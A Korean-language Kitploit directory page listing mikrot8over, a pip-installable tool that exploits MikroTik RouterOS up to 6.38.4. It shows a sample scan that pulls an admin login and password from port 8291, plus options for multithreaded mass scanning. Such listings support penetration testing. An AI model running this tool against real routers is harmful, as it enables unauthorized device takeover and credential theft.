Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
mikrot8over — mikrot8over: Mikrotik RouterOS 6.38.4까지의 빠른 익스플로잇 도구 | Kitploit
도구/GitHubGitHub/vulnerscom/mikrot8over
Vulnerability AnalysisExploitationNetwork SecurityPenetration Testing
GitHubvulnerscom/mikrot8over

mikrot8over

mikrot8over: Mikrotik RouterOS 6.38.4까지의 빠른 익스플로잇 도구

저장소 보기
110345년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

mikrot8over

mikrot8over: RouterOS 6.38.4 이하 Mikrotik 장비를 위한 빠른 익스플로잇 도구

Current Release

설명

이 도구는 기존 Mikrotik 익스플로잇을 재구성한 것입니다. Python 2 호환성과 멀티스레딩 스캔 기능이 추가되었습니다.

Python 버전

이 유틸리티는 python2.6, python2.7, *python3.**에서 테스트되었습니다. 버그를 발견하시면 주저하지 말고 이슈를 열어주세요.

설치 방법

pip install mikrot8over

스캔 및 익스플로잇

root@kitploit:~
# pip install mikrot8over
# mikrot8over 127.0.0.1
Starting scan for IP 127.0.0.1, port 8291 running in 10 threads
100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 3379.78it/s]
+----------------------+--------------------------------+------------------------------------------------------------------------------------------------------+
|          IP          |             Login              |                                               Password                                               |
+======================+================================+======================================================================================================+
       127.0.0.1                    admin                                                              admin
+----------------------+--------------------------------+------------------------------------------------------------------------------------------------------+

성능 튜닝

대규모 네트워크 스캔을 위해 최대 스레드 수와 소켓 타임아웃을 설정할 수 있습니다.

root@kitploit:~
# pip install mikrot8over
# mikrot8over --help
Usage:
        Mikrotik exploit from Vault 7 CIA Leaks automation tool
        Takeovers up to RouterOS 6.38.4.

        Usage: mikrot8over IP_ADDRESS


Options:
  -h, --help            show this help message and exit
  -p PORT, --port=PORT  List of the port to scan. Default is 8291
  -t THREADS, --threads=THREADS
                        Number of scan threads. Default is 10 that fits the
                        most of systems
  -o TIMEOUT, --timeout=TIMEOUT
                        Socket connection timeout
도구 다운로드